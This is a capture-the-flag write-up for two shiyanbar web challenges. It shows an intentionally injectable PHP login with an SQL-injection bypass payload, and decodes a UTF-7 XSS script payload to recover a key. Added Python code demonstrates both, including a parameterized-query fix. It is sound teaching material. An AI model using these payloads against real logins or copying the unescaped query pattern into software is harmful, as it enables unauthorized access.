This post is a write-up of 实验吧 (shiyanbar) CTF challenges. I hope more CTF friends will join in and exchange ideas.

1. The programmer's problem

Points: 10  Difficulty: easy
Challenge link: http://ctf5.shiyanbar.com/web/4/index.php
Open the page and right-click to view the source; you will find a link to an index.txt, which holds the PHP source of the login page.

index.txt

<html>
<head>
welcome to simplexue
</head>
<body>
<?php

if ($_POST['user'] && $_POST['pass']) {
    $conn = mysql_connect("*******", "****", "****");
    // mysql_connect() returns a resource (or false), not a mysqli object,
    // so the connection check has to test the return value directly.
    if (!$conn) {
        die("Connection failed: " . mysql_error());
    }
    mysql_select_db("****") or die("Could not select database");

    // The username is concatenated into the query unescaped; only the
    // password is hashed. This is the injection point.
    $user = $_POST['user'];
    $pass = md5($_POST['pass']);
    //admin') and 1=1 --
    $sql = "select user from php where (user='$user') and (pw='$pass')";
    $query = mysql_query($sql);
    if (!$query) {
        printf("Error: %s\n", mysql_error($conn));
        exit();
    }
    // Only the first returned row is looked at.
    $row = mysql_fetch_array($query, MYSQL_ASSOC);
    //echo $row["pw"];
    if ($row['user'] == "admin") {
        echo "<p>Logged in! Key: *********** </p>";
    }

    if ($row['user'] != "admin") {
        echo("<p>You are not admin!</p>");
    }
}

?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.txt">
</html>

So this is a PHP code-audit challenge, and the source is short: $_POST['user'] is concatenated into the query without any filtering or escaping, while only the password goes through md5(). The condition that matters is $row['user'] == "admin": the key is printed whenever the first row the query returns belongs to admin. Type admin') and 1=1 -- into the username field (keep the space after --, MySQL only treats -- as a comment when whitespace follows it) and anything at all into the password field. The ') closes the user comparison, 1=1 keeps the WHERE clause true, and the comment swallows the rest of the statement, password check included, so the query returns the admin row and the page prints the key.
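To see the injection mechanically, here is an added example (not code from the challenge or the original post) that rebuilds index.php's query construction in Python against an in-memory SQLite table. The table, its rows and the admin password are constructed stand-ins; the payload is the one from the write-up. It also shows the same query with bound parameters, which is the fix the challenge author should have applied:

```python
import hashlib
import sqlite3


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the challenge's `php(user, pw)` table.

    SQLite in memory instead of the real MySQL server; the admin password is
    made up, which is the point: the injection never needs it.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE php (user TEXT, pw TEXT)")
    conn.executemany(
        "INSERT INTO php VALUES (?, ?)",
        [("admin", md5_hex("made-up-admin-password")), ("guest", md5_hex("guest"))],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, password: str):
    """Builds the query exactly like index.php: the username is interpolated
    unescaped, only the password is hashed. Returns the user column of the
    first row, or None when nothing matches."""
    sql = f"select user from php where (user='{user}') and (pw='{md5_hex(password)}')"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn: sqlite3.Connection, user: str, password: str):
    """Same query with bound parameters: the username can no longer close the
    quote or append SQL, so the password check always applies."""
    sql = "select user from php where (user=?) and (pw=?)"
    row = conn.execute(sql, (user, md5_hex(password))).fetchone()
    return row[0] if row else None


def is_admin(user_column) -> bool:
    """The check index.php makes before printing the key."""
    return user_column == "admin"


# The write-up's payload. The closing quote and parenthesis end the user
# comparison, "1=1" keeps the WHERE clause true, and "-- " comments out the
# rest of the statement, password check included. MySQL needs the space after
# "--"; SQLite does not, but the payload works unchanged on both.
PAYLOAD = "admin') and 1=1 -- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload :", login_vulnerable(db, PAYLOAD, "whatever"))
    print("vulnerable, honest  :", login_vulnerable(db, "admin", "whatever"))
    print("fixed, payload      :", login_fixed(db, PAYLOAD, "whatever"))
```

With the payload, the statement that actually runs is select user from php where (user='admin') and 1=1 -- ') and (pw='...'), everything from -- onward being a comment. A shorter admin') -- would do the same job; the and 1=1 only makes the trick visible.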

2. Can you cross over?

Points: 30  Difficulty: hard
Challenge link: http://ctf5.shiyanbar.com/basic/xss/
Open the link and you are given a tip:

http://www.test.com/NodeMore.jsp?id=672613&page=2&pageCounter=32&undefined&callback=%2b/v%2b%20%2bADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAGsAZQB5ADoALwAlAG4AcwBmAG8AYwB1AHMAWABTAFMAdABlAHMAdAAlAC8AIgApADwALwBzAGMAcgBpAHAAdAA%2bAC0-&_=1302746925413 

After percent-decoding, the value of the callback parameter is:

+/v+ +ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAGsAZQB5ADoALwAlAG4AcwBmAG8AYwB1AHMAWABTAFMAdABlAHMAdAAlAC8AIgApADwALwBzAGMAcgBpAHAAdAA+AC0-

Since the hint is XSS, the trick must be in the encoding. The pattern +Axxxxxxxxx- is a UTF-7 shift sequence: a + followed by modified base64 (no = padding) of UTF-16BE code units, terminated by -. The leading +/v+ is one of the spellings of the UTF-7 byte-order mark (+/v8- is the canonical one) that old IE's charset sniffing keyed on to switch a page to UTF-7, which is what made this payload work as XSS. For the key we only need the long shift sequence, so take just

+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAGsAZQB5ADoALwAlAG4AcwBmAG8AYwB1AHMAWABTAFMAdABlAHMAdAAlAC8AIgApADwALwBzAGMAcgBpAHAAdAA+AC0-

Decode it as UTF-7 and the key is in the alert text.
(screenshot: safafwqttqtt.png, the decoded result)
Enter the key into the input box and press Enter to get the flag.
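The decoding step done in code, as an added example that is not part of the original post: it extracts the callback value from the tip URL, decodes each UTF-7 shift sequence by hand (base64 to UTF-16BE) so the mechanics are visible, and pulls the text after key: out of the alert() call. The tip URL and callback value are the ones from the challenge; the helper names are this example's own. Python's strict utf-7 codec handles the long +ADw...- segment fine but rejects the +/v+ BOM variant (its two leftover bits are not zero), which is why the lenient decoder is written out:

```python
import base64
import codecs
import re
from urllib.parse import parse_qs, urlsplit

# The tip URL from the challenge, copied verbatim.
TIP_URL = (
    "http://www.test.com/NodeMore.jsp?id=672613&page=2&pageCounter=32&undefined"
    "&callback=%2b/v%2b%20%2bADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAGsAZQB5ADoALwAl"
    "AG4AcwBmAG8AYwB1AHMAWABTAFMAdABlAHMAdAAlAC8AIgApADwALwBzAGMAcgBpAHAAdAA%2bAC0-"
    "&_=1302746925413"
)

# A UTF-7 shift sequence: '+', modified base64 (no '=' padding), optional '-' terminator.
SHIFT_RE = re.compile(r"\+([A-Za-z0-9+/]*)-?")


def extract_callback(url: str) -> str:
    """Pull the percent-decoded callback value out of the query string.

    The raw URL spells every plus sign as %2b, so parse_qs's plus-to-space
    rule does not interfere here.
    """
    return parse_qs(urlsplit(url).query)["callback"][0]


def decode_shift(b64: str) -> str:
    """Decode the base64 body of one shift sequence by hand.

    UTF-7 base64 carries UTF-16BE code units; the bit stream is not padded to
    a byte boundary, so a trailing partial byte is discarded.
    """
    if b64 == "":
        return "+"  # "+-" is how UTF-7 spells a literal plus sign
    pad = (-len(b64)) % 4
    if pad == 3:
        raise ValueError("impossible base64 length in shift sequence")
    raw = base64.b64decode(b64 + "=" * pad)
    raw = raw[: len(raw) - len(raw) % 2]
    return raw.decode("utf-16-be")


def decode_utf7_lenient(text: str) -> str:
    """Replace every shift sequence in text with its decoded characters.

    Unlike Python's strict 'utf-7' codec this accepts the '+/v+' BOM variant
    (it decodes to U+FEFF) instead of raising on its non-zero padding bits.
    """
    return SHIFT_RE.sub(lambda m: decode_shift(m.group(1)), text)


def alert_text(decoded: str) -> str:
    """Return the string literal passed to alert() in the decoded payload."""
    m = re.search(r'alert\("([^"]*)"\)', decoded)
    return m.group(1) if m else ""


def key_from_alert(decoded: str) -> str:
    """The part of the alert text after the 'key:' label."""
    text = alert_text(decoded)
    return text.split("key:", 1)[1] if "key:" in text else ""


if __name__ == "__main__":
    cb = extract_callback(TIP_URL)
    print("callback :", cb)
    shifted = SHIFT_RE.findall(cb)[-1]  # base64 body of the long +ADw...- segment
    print("strict   :", codecs.decode(("+" + shifted + "-").encode(), "utf-7"))
    decoded = decode_utf7_lenient(cb)
    print("lenient  :", repr(decoded))
    print("key      :", key_from_alert(decoded))
```

The decoded segment is a complete <script>alert("key:...")</script> block, so the payload only fires in a browser that decides the page is UTF-7; modern browsers dropped UTF-7 sniffing, which is why the page makes you read the key out of the decoded text instead of popping the alert.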